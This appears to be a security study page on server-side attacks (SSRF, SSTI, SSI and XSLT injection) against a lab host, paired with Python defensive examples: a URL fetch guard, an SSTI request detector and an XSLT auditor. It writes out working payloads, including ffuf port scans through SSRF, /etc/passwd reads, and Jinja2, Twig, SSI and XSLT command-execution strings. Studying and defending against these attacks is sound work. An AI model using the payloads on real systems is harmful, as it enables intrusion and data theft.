Server Side Attacks

From SSRF, SSTI to SSI injections.

Server-side Request Forgery or SSRF

If a server fetches resources based on user input such as a URL, an attacker can make the server issue unintended requests. Several URL schemes are relevant:

  • http:// and https://: fetches content over HTTP/S, which can reach hosts on the internal network.

  • file://: reads local files on the web server.

  • gopher://: sends HTTP POST requests or raw payloads to databases or mail servers.

Look for parameters that pass URLs and try pointing them at your own listener or at the internal network, for example http://127.0.0.1/index.php.
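The defensive counterpart of the scheme list above is a fetch guard that denies by default. The following is an added example (not code from the original page): it assumes the application only ever needs http/https on default ports to a small allowlist of hostnames (the `dateserver.example` entry is hypothetical), and it takes the DNS resolver as a parameter so the check can be exercised offline and re-run on every redirect hop.

```python
"""Guard for server-side fetches of user-supplied URLs (added example; not from
the original page). Policy assumed here: only http/https, only default ports,
only hosts on a small allowlist, and every resolved address must be public.
Resolution is injected so the check can be exercised offline."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}           # None = scheme default
ALLOWED_HOSTS = {"dateserver.example"}    # hypothetical upstream the app needs


def default_resolver(host):
    """All A/AAAA answers for host (real DNS; swapped out in tests)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public(ip_text):
    """False for loopback, RFC 1918, link-local, CGNAT, multicast, unspecified
    addresses and for IPv4-mapped IPv6 forms of those (::ffff:127.0.0.1)."""
    addr = ipaddress.ip_address(ip_text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global


def check_url(url, resolver=default_resolver):
    """Return (ok, reason). Deny by default; every refusal names its cause."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    try:
        addrs = resolver(host)
    except socket.gaierror:
        addrs = []
    if not addrs:
        return False, "host does not resolve"
    for ip_text in addrs:
        if not is_public(ip_text):
            # Allowlisted name answering with an internal address (rebinding,
            # split-horizon DNS): still refuse.
            return False, f"{host} resolves to non-public address {ip_text}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1/index.php", "file:///etc/passwd",
                      "gopher://127.0.0.1:25/", "http://dateserver.example/"):
        print(candidate, "->", check_url(candidate))
```

Use it immediately before the outbound request, with automatic redirect following disabled in the HTTP client, and call `check_url` again on each `Location` header before following it; otherwise an allowlisted host can bounce the server to 127.0.0.1.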

Port scan

Differences in the response to each request let us conduct a port scan of the internal host.

ffuf -w ./ports.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-02" -fr "Failed to connect to"

Brute force directories

Use the request data -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" to fuzz for .php pages on the internal host.

ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"

Local File Inclusion (LFI)

Use the file:// scheme in the data payload: -d "dateserver=file:///etc/passwd&date=2024-01-01"

Blind SSRF

If there is an SSRF vulnerability but we cannot see the response, it is called a blind SSRF vulnerability. A netcat listener that receives the callback can confirm the vulnerability.

Server-side Template Injection or SSTI

SSTI occurs when user input is inserted into the template itself before rendering, allowing code execution.

As with SQL injection, we can identify the vulnerability with test payloads:

{{7*7}}
{{7*'7'}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Local File Inclusion (LFI) Jinja2

{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

Remote Code Execution (RCE) Jinja2

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Local File Inclusion (LFI) Twig

{{ "/etc/passwd"|file_excerpt(1,-1) }}

Remote Code Execution (RCE) Twig

{{ ['id'] | filter('system') }}
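A detection-side check for the probes listed above and for the Jinja2/Twig LFI and RCE payloads, added here as an example (not code from the original page): it URL-decodes a form body the way the server would, looks for the template-expression syntaxes, and separates bare arithmetic probes from expressions that contain the attribute chains and filters used by the payloads. The request bodies are constructed samples.

```python
"""Classify request parameters for SSTI probes and payloads (added example;
not from the original page). Stdlib only; input is a form-encoded body."""
import re
from urllib.parse import parse_qsl

# Template-expression syntaxes covered by the probes on this page:
# {{...}} (Jinja2/Twig), ${...} and ${{...}}, <%=...%> (ERB/JSP), #{...}.
PROBE_RE = re.compile(r"\{\{.+?\}\}|\$\{.+?\}|<%=.+?%>|#\{.+?\}", re.DOTALL)

# Substrings taken from the LFI/RCE payloads above: seeing any of them inside a
# template expression means exploitation, not a "does 7*7 render as 49" probe.
EXPLOIT_MARKERS = ("__globals__", "__builtins__", "__import__", "popen(",
                   "open(", "file_excerpt", "'system'", '"system"')

# Constructed sample bodies in the shape of the page's dateserver form.
SAMPLE_BODIES = [
    "dateserver=http://dateserver.htb/&date=2024-01-01",
    "dateserver=%7B%7B7*7%7D%7D&date=2024-01-01",
    "dateserver=%7B%7B+%5B'id'%5D+%7C+filter('system')+%7D%7D&date=2024-01-01",
]


def classify(value):
    """None for ordinary input, "probe" for a bare template expression,
    "exploit" when the expression carries a known LFI/RCE marker."""
    m = PROBE_RE.search(value)
    if not m:
        return None
    expr = m.group(0)
    if any(marker in expr for marker in EXPLOIT_MARKERS):
        return "exploit"
    return "probe"


def scan_body(body):
    """Decode a form body and return (param, verdict, expression) per hit."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        verdict = classify(value)
        if verdict:
            findings.append((name, verdict, PROBE_RE.search(value).group(0)))
    return findings


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body, "->", scan_body(body))
```

This belongs in a WAF rule or in request logging, not in the template engine: the fix for SSTI is to pass user input to the template as a variable rather than concatenating it into the template source, and a detector like this only tells you who is testing for the mistake.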

SSI Injection

Server-Side Includes (SSI) are used by web apps to create dynamic content on HTML pages. Use of SSI is indicated by files with these extensions:

  • .shtml

  • .shtm

  • .stm

SSI directives consist of:

  • name: the directive's name

  • parameter name: one or more parameters

  • value: one or more parameter values

Several example payloads:

<!--#printenv -->
<!--#name param1="value1" param2="value" -->
<!--#exec cmd="whoami" -->

XSLT Injection

eXtensible Stylesheet Language Transformations (XSLT) can select specific nodes from an XML document and transform the XML structure; the injected fragments below abuse that to read files and run commands.

# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />

# RCE
<xsl:value-of select="php:function('system','id')" />
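When a server applies a stylesheet that users can influence, a static check before the transform catches the two mechanisms used above: the PHP extension namespace behind `php:function()` and XPath calls such as `unparsed-text()` or `document()` that reach outside the input document. This is an added example (not code from the original page) using only the standard library; the stylesheets are constructed samples, and for fully untrusted XML the `defusedxml` package is the safer parser.

```python
"""Static audit of an XSLT stylesheet before the server applies it (added
example; not from the original page)."""
import io
import re
import xml.etree.ElementTree as ET

PHP_XSL_NS = "http://php.net/xsl"   # namespace that exposes PHP functions to XSLT
RISKY_CALL = re.compile(r"\b(php:function|unparsed-text|document)\s*\(")
SCANNED_ATTRS = ("select", "test", "match", "href")

# Constructed samples: the page's payloads inside a minimal stylesheet, and a
# benign stylesheet that only reads a node of the input document.
MALICIOUS = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
    <xsl:value-of select="php:function('system','id')" />
    <xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
  </xsl:template>
</xsl:stylesheet>"""

BENIGN = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:value-of select="/root/name" />
  </xsl:template>
</xsl:stylesheet>"""


def declared_namespaces(xml_text):
    """URIs of every xmlns declaration in the document."""
    stream = io.BytesIO(xml_text.encode("utf-8"))
    return {uri for _, (_, uri) in ET.iterparse(stream, events=("start-ns",))}


def audit_stylesheet(xml_text):
    """Return [(where, what)] findings; an empty list means nothing flagged."""
    findings = []
    if PHP_XSL_NS in declared_namespaces(xml_text):
        findings.append(("xmlns", PHP_XSL_NS))
    root = ET.fromstring(xml_text.encode("utf-8"))
    for el in root.iter():
        for attr in SCANNED_ATTRS:
            value = el.get(attr)
            if value is None:
                continue
            for m in RISKY_CALL.finditer(value):
                findings.append((attr, m.group(1)))
    return findings


if __name__ == "__main__":
    print("malicious:", audit_stylesheet(MALICIOUS))
    print("benign:", audit_stylesheet(BENIGN))
```

On the PHP side the audit is a backstop: not calling `registerPHPFunctions()` on the `XSLTProcessor`, and keeping stylesheets in server-controlled files rather than accepting them from users, removes the RCE path entirely.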
